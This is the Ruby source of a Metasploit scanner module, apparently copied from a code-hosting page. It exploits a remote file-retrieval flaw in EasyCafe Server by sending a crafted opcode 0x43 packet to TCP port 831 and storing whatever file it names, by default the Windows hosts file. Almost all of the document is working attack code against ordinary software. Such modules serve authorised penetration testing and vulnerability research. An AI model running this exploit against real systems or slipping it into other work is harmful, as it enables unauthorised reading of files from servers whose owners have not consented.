98 lines
2.5 KiB
Ruby
98 lines
2.5 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit4 < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'EasyCafe Server Remote File Access',
|
|
'Description' => %q{
|
|
This module exploits a file retrieval vulnerability in
|
|
EasyCafe Server. The vulnerability can be triggered by
|
|
sending a specially crafted packet (opcode 0x43) to the
|
|
831/TCP port.
|
|
This module has been successfully tested on EasyCafe Server
|
|
version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
|
|
and Windows 7 SP1.
|
|
Note that the server will throw a popup messagebox if the
|
|
specified file does not exist.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'R-73eN', # Vulnerability Discovery
|
|
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'EDB', '39102' ]
|
|
]
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(831),
|
|
OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
|
|
], self.class)
|
|
end
|
|
|
|
def get_file
|
|
res = sock.get_once
|
|
unless res
|
|
print_error("Unable to retrieve file due to a timeout.")
|
|
return
|
|
end
|
|
|
|
unless res.length == 261
|
|
print_error("Received a response of an invalid size.")
|
|
return
|
|
end
|
|
|
|
file_size = res.unpack('@256V')[0]
|
|
contents = ''
|
|
while contents.length < file_size
|
|
contents << sock.get_once
|
|
end
|
|
|
|
print_status("File retrieved successfully (#{contents.length} bytes)!")
|
|
contents
|
|
end
|
|
|
|
def run_host(ip)
|
|
file_path = datastore['FILEPATH']
|
|
if file_path.length > 67
|
|
print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
|
|
return
|
|
end
|
|
|
|
packet = "\x43"
|
|
packet << file_path
|
|
packet << "\x00" * (255 - file_path.length)
|
|
packet << "\x01\x00\x00\x00\x01"
|
|
|
|
vprint_status("Sending request (#{packet.length} bytes)")
|
|
connect
|
|
sock.put(packet)
|
|
|
|
contents = get_file
|
|
disconnect
|
|
return if contents.nil?
|
|
|
|
path = store_loot(
|
|
'easycafe_server',
|
|
'application/octet-stream',
|
|
ip,
|
|
contents,
|
|
File.basename(file_path)
|
|
)
|
|
print_status("File saved in: #{path}")
|
|
end
|
|
end
|